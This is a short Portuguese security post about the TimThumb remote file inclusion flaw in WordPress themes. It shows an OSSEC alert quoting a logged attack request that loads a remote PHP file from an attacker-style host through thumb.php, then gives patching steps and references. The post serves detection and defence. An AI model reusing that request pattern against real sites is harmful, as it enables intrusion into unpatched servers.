Sugiu uma vulnerabilidade no WordPress classificada como alta, a falha foi encontrada no script timthumb presente na maioria dos templates e permite a inclusão de arquivos maliciosos.
O Ossec alerta e bloqueia as tentativas de ataque com o objetivo de explorar está vulnerabilidade se o active-response estiver habilitado.
OSSEC HIDS Notification.
2011 Nov 11 03:29:38Received From: acme->/var/log/httpd/www.acme.com-access_log
Rule: 31151 fired (level 10) -> “Mutiple web server 400 error codes from same source ip.”
Portion of the log(s):xx.xxx.xxx.xxx – – [11/Nov/2011:04:29:25 -0200] “GET //wp-content/themes/Quadro/thumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1” 404 232 “-” “Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4”
Para corrigi-la é necessário executar os seguintes passos:
1 . Localizar se o arquivo timthumb.php, thumb.php ou similar que encontra-se no diretório template localizado em /wp-content/themes;
2. Em caso afirmativo substituir todo o código pela nova versão[1]
[1] code.google.com/p/timthumb/source/browse/trunk/timthumb.php
Maiores informações:
blog.ptservidor.pt/seguranca/alerta-de-seguranca-vulnerabilidade-timthumb/
blog.spiderlabs.com/2011/11/wordpress-timthumb-attacks-rising.html
markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/